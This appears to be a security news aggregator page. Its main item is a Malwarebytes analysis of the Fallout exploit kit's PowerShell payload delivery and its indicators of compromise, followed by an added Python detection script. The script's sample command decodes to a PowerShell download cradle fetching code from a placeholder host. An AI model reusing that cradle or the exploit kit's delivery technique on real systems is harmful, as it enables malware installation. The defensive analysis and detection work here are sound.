Analyst Workflow: Applying the MITRE ATT&CK Framework to Recorded Future

Key Takeaways

  • Traditionally, researching, analyzing, and reporting on the tactics, techniques, and procedures (TTPs) of a threat actor using the MITRE ATT&CK framework would take weeks of an analyst’s time — but Recorded Future can do it in minutes.
  • Because it is so powerful and flexible, this capability has the potential to help advance the security program of all Recorded Future customers.
  • The MITRE ATT&CK TTP lists within Recorded Future can be applied to any industry, threat actor, or company.
  • The data fidelity of Recorded Future is fully on display when aligned with the MITRE ATT&CK framework. Customers can gain detailed insights into patterns of threat actor activity that dynamically update in real time as new data becomes available.

Today, many security teams consume deep threat actor research through paid or freemium “snapshot in time” reports written by security vendors, researchers, or consultants. In this blog, we’ll explain how applying the MITRE ATT&CK framework to Recorded Future data can give your team the ability to do this deep-level analysis on the fly, for any threat actor, across all sources.

This Week in Security News: Risky Radio Remotes and Cybercrime

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about Trend Micro’s new research on radio frequency technology and the risks of radio remote controllers. Also, understand why there is a rise in physical crime in the cybercrime underground.

Fallout EK Returns With New Features

Our Counterintelligence Team gathers information and conducts operations to identify threats to an organization so that they can better protect against malicious activity. We accomplish this by combining technology with skilled and experienced intelligence specialists. Our goal is to protect your data, your brand and your people.

Tampa Bay Federal Credit Union Suffers Spoofed Debit Cards

OpIcarus Slowly Limping Along

Do You Know Your Customers?

Every third Thursday of each quarter, ‘Know Your Customer’ Day is held. The day transcends all industries, aimed at businesses and designed to serve as a reminder of how important it is to take the time to understand your customer.

Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices

Digital transformation and the transition to a modern workplace encourage employee engagement, productivity, and collaboration. This transition poses major challenges in protecting sensitive information. In the modern workplace, the perimeter between the corporate network and the cloud is fading. Sensitive data constantly travels between different locations and is often shared with others – both inside and outside the organization. This significantly increases the attack surface and makes identifying, protecting, and monitoring sensitive data challenging.

Improved Fallout EK comes back after short hiatus

After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year. During its absence, we noticed an increase in RIG EK campaigns, perhaps to fill that temporary void.

Fallout EK is distributed via malvertising chains (one of them we track under the name HookAds), especially through adult traffic. Since January 15, Fallout EK activity has been picking up pace again to deliver the GandCrab ransomware.

The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.

Fallout EK 2019 highlights:

  • HTTPS support
  • New landing page format
  • New Flash exploit (CVE-2018-15982)
  • PowerShell to run payload

One aspect that caught our attention was how Fallout was delivering its payload via PowerShell rather than using iexplore.exe. This was also mentioned in the EK developer’s advert reposted by Kafeine on his site.

The Base64-encoded PowerShell command calls out to the payload URL and loads it in its own way:

This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.
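As an added illustration (not part of the Malwarebytes write-up), the following Python script shows how a defender can check process-creation telemetry for the behaviour described above: PowerShell launched by a browser process with a Base64-encoded command, which the script decodes to recover any download URL. The log record format, field names, file paths, browser list and the encoded sample command are all constructed for this example and are not taken from the Fallout EK campaign itself.

```python
import base64
import re

# Browser processes that should not normally spawn PowerShell (assumed list).
BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts -EncodedCommand and its prefixes (-e, -ec, -enc);
# the argument is Base64 of a UTF-16LE script.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+['\"]?([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # bad Base64, or an odd byte count for UTF-16LE
        return None


def parse_event(line):
    """Parse a constructed 'Key=Value|Key=Value' process-creation record."""
    event = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event


def assess(line):
    """Assess one record: browser-spawned PowerShell, encoded command, URLs."""
    ev = parse_event(line)
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    result = {"suspicious": False, "reasons": [], "decoded": None, "urls": []}
    if image not in POWERSHELL_IMAGES:
        return result
    if parent in BROWSER_PARENTS:
        result["reasons"].append(f"{parent} spawned {image}")
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if decoded is not None:
        result["decoded"] = decoded
        result["urls"] = URL_RE.findall(decoded)
        result["reasons"].append("encoded command")
        if result["urls"]:
            result["reasons"].append("decoded script references a URL")
    # A browser launching PowerShell is the alert condition; the decoded
    # command and any URL it carries are enrichment for triage.
    result["suspicious"] = parent in BROWSER_PARENTS
    return result


# Constructed sample: a decoded script and its -EncodedCommand form.
DECODED_SCRIPT = ("(New-Object Net.WebClient)"
                  ".DownloadString('http://payload.example.invalid/stage2.ps1')")
ENCODED = base64.b64encode(DECODED_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    "ParentImage=C:\\Program Files\\Internet Explorer\\iexplore.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -enc " + ENCODED,
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -NoProfile -Command Get-Process",
]

if __name__ == "__main__":
    for record in SAMPLE_EVENTS:
        r = assess(record)
        print("SUSPICIOUS" if r["suspicious"] else "ok", r["reasons"], r["urls"])
```

The decode step matters for the hunt, not just the alert: once the UTF-16LE script is recovered, the URL inside it can be matched against the campaign's published indicators and against proxy logs for the same host.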

What this new development tells us is that exploit kit developers are still monitoring the scene for new exploits and techniques. In 2018, several zero-days for Internet Explorer and Flash Player were found and turned into easily adaptable proof of concepts. Even though the market share for IE and Flash continues to drop, there are many countries still running older systems where the default browser is Internet Explorer. Therefore, threat actors will take advantage.

Malwarebytes users are already protected against this updated Fallout EK.

Indicators of Compromise

  • 185.56.233[.]186, advancedfeed[.]pro (HookAds campaign)
  • 51.15.35[.]154, payformyattention[.]site (Fallout EK)

Succeed in Your Cloud Migration With a Secure Hybrid Cloud Strategy

Picture this: An object storage misconfiguration has left thousands of customer records fully exposed. Your company is about to face costly compliance consequences and a loss of customer trust. How should you respond? More importantly, how could a secure hybrid cloud strategy have helped prevent such an incident from happening in the first place?

10 Cybersecurity Conference Trips You Should Make Time for This Year

Cybersecurity remains a top priority for chief information security officers (CISOs) worldwide, but it’s easy to get out of touch as the industry evolves at breakneck speed and attackers discover new and innovative ways to compromise corporate networks. That’s why it’s worth investing in cybersecurity conference trips to help IT professionals stay up-to-date by networking with vendors, thought leaders and colleagues.

MEGA Data Breach

A newly revealed trove of 772,904,991 unique email addresses and more than 21 million unique passwords, aggregated from over 2,000 leaked databases, was recently discovered by Troy Hunt, the security researcher who maintains HaveIBeenPwned. The records were stored on one of the most popular cloud storage sites, MEGA, until they were taken down, and then on a public hacking site. The credentials were not even for sale; they were simply available for anyone to take. In total, 1,160,253,228 unique combinations of email addresses and passwords were exposed.